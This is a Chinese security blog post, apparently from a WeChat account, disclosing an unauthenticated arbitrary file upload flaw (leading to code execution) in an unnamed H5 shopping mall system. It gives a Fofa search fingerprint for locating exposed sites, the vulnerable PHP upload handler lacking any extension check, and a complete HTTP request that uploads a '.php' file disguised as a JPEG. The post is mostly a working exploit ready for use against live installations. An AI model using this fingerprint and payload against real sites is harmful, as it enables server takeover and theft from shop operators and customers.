点击上方蓝字关注我们 并设为星标
0x00 前言
该源码采用HTML5技术开发,可以完美适配各种移动设备,以及iOS和Android系统。同时,易支付接口更为商家提供了便捷的交易功能,让顾客可以轻松通过手机进行网络支付,享受到更加便捷的购物体验。
该源码界面设计十分简洁、清爽,同时还保证了购物流程的顺畅和简便。无论是主页、分类页面、商品详情页面,都给人留下了很好的第一印象。
Fofa指纹:"/src/images/gg.png" && "/public/goods.php"
0x01 漏洞分析&复现
if($_GET['upload']){
// 获取上传的文件名
$file = pathinfo($_FILES['file']['name']);
//获取上传文件的后缀
$file_hz= $file['extension'];
//以当前时间来拼接一个文件名
$file_date = date('Ymdhis');
$file_name = $file_date . '.' . $file_hz;
//判断当前目录下是否有upload这个文件没有就创建一个
$path = 'upload/';
$file_path=file_exists($path);
if(!$file_path){
mkdir($path);
}
//如果有上传文件为就执行下面代码
if(is_uploaded_file($_FILES['file']['tmp_name'])){
//将上传的临时tmp文件移动到指定位置,并且已指定的file_name来命名文件,成功就echo输出移动后的文件位置。
if(move_uploaded_file($_FILES['file']['tmp_name'],$path.$file_name)){
// echo "当前文件保存路径为:".$_FILES['file']['tmp_name'],$path.;
// echo '文件上传成功';
echo json_encode('/admin/commodtiy/upload/'.$file_name);
} else {
echo '文件上传失败';
}
} else {
echo '文件不存在';
}
}
Payload:
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
Cache-Control: max-age=0
Connection: keep-alive
Content-Length: 197
Content-Type: multipart/form-data; boundary=------WebKitFormBoundary03rNBzFMIytvpWhy
Cookie: Hm_lvt_d3b3b1b968a56124689d1366adeacf8f=1731328644; PHPSESSID=nbkea3f11cmfad1qhfcm29aqn7; thinkphp_show_page_trace=0|0; bh_myaction=Index%2Findex; _ga=GA1.1.2095806093.1731475984; _gid=GA1.1.546134623.1731475984; yzm=G2DD
Host: 127.0.0.1
Origin: http://127.0.0.1
Referer: http://127.0.0.1/admin/commodtiy/file.php?upload
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
sec-ch-ua: "Chromium";v="130", "Google Chrome";v="130", "Not?A_Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
sec-fetch-user: ?1
------WebKitFormBoundary03rNBzFMIytvpWhy
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/jpeg
phpinfo();
------WebKitFormBoundary03rNBzFMIytvpWhy--
0x02 源码下载
标签:代码审计,0day,渗透测试,系统,通用,0day,闲鱼,转转
购物商城源码关注公众号发送 241117 获取!
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,文章作者和本公众号不承担任何法律及连带责任,望周知!!!
原文始发于微信公众号(星悦安全):某全新H5购物商城系统存在前台任意文件上传漏洞(RCE)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论